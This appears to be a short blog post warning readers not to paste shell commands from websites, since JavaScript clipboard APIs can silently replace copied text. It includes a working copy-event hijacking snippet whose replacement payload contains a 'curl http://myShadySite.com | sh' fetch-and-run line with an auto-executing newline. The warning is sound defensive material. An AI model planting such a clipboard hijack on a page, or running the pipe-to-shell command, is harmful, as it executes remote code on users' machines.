Don't Copy Paste into terminal

Other Oct 24, 2020

When you see a shell command on the Internet, do not copy it into your terminal.

Modern JavaScript Clipboard APIs allow a website to overwrite what is added to the clipboard.

Here is an example of how simple this attack can be.

$ echo "looks safe to me!"

Note that you don't even have to press ENTER in your terminal after pasting for the exploit to happen. The payload conveniently contains a trailing newline that does that for you!

Here is the JavaScript that is performing the exploit.

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain', 
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'
    );
    e.preventDefault();
});

Sources:
https://briantracy.xyz/writing/copy-paste-shell.html

Cover Image Credit: https://www.pexels.com/@soumil-kumar-4325

Tags

Great! You've successfully subscribed.
Great! Next, complete checkout for full access.
Welcome back! You've successfully signed in.
Success! Your account is fully activated, you now have access to all content.